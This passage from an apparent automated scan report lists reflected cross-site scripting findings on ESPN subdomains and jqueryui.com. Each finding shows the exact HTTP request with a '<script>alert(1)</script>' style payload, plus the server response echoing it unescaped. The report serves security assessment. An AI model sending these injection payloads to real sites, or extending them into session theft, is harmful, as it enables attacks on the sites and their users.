This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pokerpickem/en/story98bbc<script>alert(1)</script>d41001c2763 HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17800
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

       <head>
<script type="text/javascript" lang
...[SNIP]...
<h2>/pokerpickem/en/story98bbc<script>alert(1)</script>d41001c2763</h2>
...[SNIP]...

5.44. http://insider.espn.go.com/insider/blog [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insider.espn.go.com
Path:   /insider/blog

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a591<script>alert(1)</script>4469738f57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /insider/blog1a591<script>alert(1)</script>4469738f57 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 133
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-05/06

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/blog1a591<script>alert(1)</script>4469738f57</BODY></HTML>

5.45. http://insider.espn.go.com/insider/index [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insider.espn.go.com
Path:   /insider/index

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2f55<script>alert(1)</script>52656a339f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /insider/indexf2f55<script>alert(1)</script>52656a339f6 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 135
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-05/06

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/indexf2f55<script>alert(1)</script>52656a339f6</BODY></HTML>

5.46. http://insider.espn.go.com/insider/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insider.espn.go.com
Path:   /insider/news

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0146<script>alert(1)</script>35faeff8fe6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /insider/newsd0146<script>alert(1)</script>35faeff8fe6 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 134
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-05/06

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/newsd0146<script>alert(1)</script>35faeff8fe6</BODY></HTML>

5.47. http://insider.espn.go.com/insider/rumorcentral [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insider.espn.go.com
Path:   /insider/rumorcentral

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 941a2<script>alert(1)</script>9a411c627fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /insider/rumorcentral941a2<script>alert(1)</script>9a411c627fc HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 142
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-05/06

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/rumorcentral941a2<script>alert(1)</script>9a411c627fc</BODY></HTML>

5.48. http://insider.espn.go.com/insider/rumorcentral [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insider.espn.go.com
Path:   /insider/rumorcentral

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba35"><script>alert(1)</script>2279e161389 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /insider/rumorcentral?eba35"><script>alert(1)</script>2279e161389=1 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 47910
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
Server: barista/3.3.6
Set-Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; expires=Sun, 07-Nov-2010 02:13:34 GMT; path=/; domain=.go.com;
Set-Cookie: ESPNInsiderRegTrackX=; expires=Sat, 06-Nov-2010 16:13:34 GMT; path=/; domain=.go.com;
Via: 8810-05/06
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>ESPN Insider: ESPN Insider: Rumor Central - MLB</TITLE>

...[SNIP]...
<a href="#" onClick="openWin=window.open('http://sendtofriend.espn.go.com/sendtofriend/SendToFriend?URL=http://insider.espn.go.com/insider/rumorcentral?eba35"><script>alert(1)</script>2279e161389=1&title=MLB%20Rumors:%20Center%20of%20attention&id=1369103', 'sendtofriend', 'noresizable,noscrollbars,width=345,height=470');" onMouseOver="window.status='Email story';return true">
...[SNIP]...

5.49. http://insider.espn.go.com/insider/sportindex [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insider.espn.go.com
Path:   /insider/sportindex

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dfccc<script>alert(1)</script>5419d7c4d6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /insider/sportindexdfccc<script>alert(1)</script>5419d7c4d6a HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 140
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-05/06

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/sportindexdfccc<script>alert(1)</script>5419d7c4d6a</BODY></HTML>

5.50. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddcf"><script>alert(1)</script>fc15db9fdd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?bddcf"><script>alert(1)</script>fc15db9fdd9=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 07 Nov 2010 00:35:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&bddcf"><script>alert(1)</script>fc15db9fdd9=1" type="text/css" media="all" />
...[SNIP]...

5.51. http://m.espn.go.com/soccer/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.espn.go.com
Path:   /soccer/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b753<script>alert(1)</script>9c552fecda5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /soccer3b753<script>alert(1)</script>9c552fecda5/ HTTP/1.1
Host: m.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 129
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/soccer3b753<script>alert(1)</script>9c552fecda5/</BODY></HTML>

5.52. http://m.espn.go.com/wireless/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.espn.go.com
Path:   /wireless/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57344<script>alert(1)</script>4ba2aaa9554 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wireless57344<script>alert(1)</script>4ba2aaa9554/ HTTP/1.1
Host: m.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 131
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/wireless57344<script>alert(1)</script>4ba2aaa9554/</BODY></HTML>

5.53. http://proxy.espn.go.com/outdoors/bassmaster/members/insider/resources/column [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://proxy.espn.go.com
Path:   /outdoors/bassmaster/members/insider/resources/column

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58f10<script>alert(1)</script>c39bdb4f674 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /outdoors/bassmaster/members58f10<script>alert(1)</script>c39bdb4f674/insider/resources/column HTTP/1.1
Host: proxy.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_v3%3D2010_nbati_xxx_xxx_xxx_xxx%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D94%3B; CRBLM_LAST_UPDATE=1289009493; ESPN360beta=betaSet; userAB=7; lang=en; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009663777%7C1383617663777%3B%20s_c24_s%3DFirst%2520Visit%7C1289011463777%3B%20s_gpv_pn%3Despn%253Ancf%253Aindex%7C1289011463789%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 174
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CAO DSP CURi ADM DEV TAIi PSA PSD IVAi IVDi CONi OUR DELi SAMi BUS PHY ONL UNI COM NAV DEM CNT STA PRE
Pool: pool-ESPN_proxy_bassmaster
Via: 8810-09/10

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/outdoors/bassmaster/members58f10<script>alert(1)</script>c39bdb4f674/insider/resources/column</BODY></HTML>

5.54. http://proxy.espn.go.com/outdoors/bassmaster/members/insider/story [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://proxy.espn.go.com
Path:   /outdoors/bassmaster/members/insider/story

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 633a0<script>alert(1)</script>c2ca6d34533 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /outdoors/bassmaster/members633a0<script>alert(1)</script>c2ca6d34533/insider/story HTTP/1.1
Host: proxy.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_v3%3D2010_nbati_xxx_xxx_xxx_xxx%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D94%3B; CRBLM_LAST_UPDATE=1289009493; ESPN360beta=betaSet; userAB=7; lang=en; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009663777%7C1383617663777%3B%20s_c24_s%3DFirst%2520Visit%7C1289011463777%3B%20s_gpv_pn%3Despn%253Ancf%253Aindex%7C1289011463789%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 163
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CAO DSP CURi ADM DEV TAIi PSA PSD IVAi IVDi CONi OUR DELi SAMi BUS PHY ONL UNI COM NAV DEM CNT STA PRE
Pool: pool-ESPN_proxy_bassmaster
Via: 8810-09/10

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/outdoors/bassmaster/members633a0<script>alert(1)</script>c2ca6d34533/insider/story</BODY></HTML>

5.55. http://sendtofriend.espn.go.com/sendtofriend/SendToFriend [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sendtofriend.espn.go.com
Path:   /sendtofriend/SendToFriend

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e04cf<script>alert(1)</script>68bc7ba9f82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendtofriende04cf<script>alert(1)</script>68bc7ba9f82/SendToFriend HTTP/1.1
Host: sendtofriend.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 147
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-03/04

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/sendtofriende04cf<script>alert(1)</script>68bc7ba9f82/SendToFriend</BODY></HTML>

5.56. http://sendtofriend.espn.go.com/sendtofriend/espn [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sendtofriend.espn.go.com
Path:   /sendtofriend/espn

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7bae5<script>alert(1)</script>2f2d8562032 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendtofriend7bae5<script>alert(1)</script>2f2d8562032/espn HTTP/1.1
Host: sendtofriend.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 139
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-03/04

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/sendtofriend7bae5<script>alert(1)</script>2f2d8562032/espn</BODY></HTML>

5.57. http://soccernet.espn.go.com/world-cup/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://soccernet.espn.go.com
Path:   /world-cup/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2757a"><script>alert(1)</script>d8f9d1d4373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /world-cup/?2757a"><script>alert(1)</script>d8f9d1d4373=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 12:56:45 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Set-Cookie: SWID=3049331C-CFBF-4614-8EC0-FF585AF6D5A9; path=/; expires=Sat, 06-Nov-2030 12:56:42 GMT; domain=.go.com;
Cache-Expires: Sat, 06 Nov 2010 12:58:42 GMT
Content-Length: 71086
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 16 Nov 2010 12:56:45 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FIFA World Cup 2010
...[SNIP]...
<a href="/worldcup/?2757a"><script>alert(1)</script>d8f9d1d4373=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory">
...[SNIP]...

5.58. http://soccernet.espn.go.com/worldcup/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://soccernet.espn.go.com
Path:   /worldcup/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f969c"><script>alert(1)</script>f855b539bca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /worldcup/?f969c"><script>alert(1)</script>f855b539bca=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Date: Sat, 06 Nov 2010 23:04:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:04:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:06:42 GMT
Content-Length: 71086
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FIFA World Cup 2010
...[SNIP]...
<a href="/worldcup/?f969c"><script>alert(1)</script>f855b539bca=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory">
...[SNIP]...

5.59. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/162/italy

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f74"><a>9d3befebb57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/162/italyb2f74"><a>9d3befebb57 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
